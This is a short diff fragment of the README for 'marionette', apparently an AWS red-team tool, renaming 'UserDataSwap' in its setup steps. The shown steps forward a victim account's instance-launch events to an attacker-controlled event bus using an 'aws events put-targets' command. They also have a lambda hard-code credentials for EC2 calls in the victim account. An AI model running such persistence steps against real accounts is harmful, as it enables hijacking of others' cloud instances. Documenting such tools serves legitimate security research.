RyanJarv/marionette/README.md

           }
         }'
     ```
-  * Add a target to forward to the event-bus in the UserDataSwap account:
+  * Add a target to forward to the event-bus in the Marionett account:
     ```
     aws events put-targets --rule run-instance-trigger \
       --event-bus-name default \
       --targets "Id"="1","Arn"="arn:aws:events:<region>:<attacker account #>:event-bus/run-instance-trigger"
     ```
-* You should see the UserDataSwap triggered when a instance is created in the victim account now.
+* You should see the Marionett triggered when a instance is created in the victim account now.
   * Update the lambda to hard code the credentials needed to make EC2 related calls in the vicitims account and deploy.

 ## More Info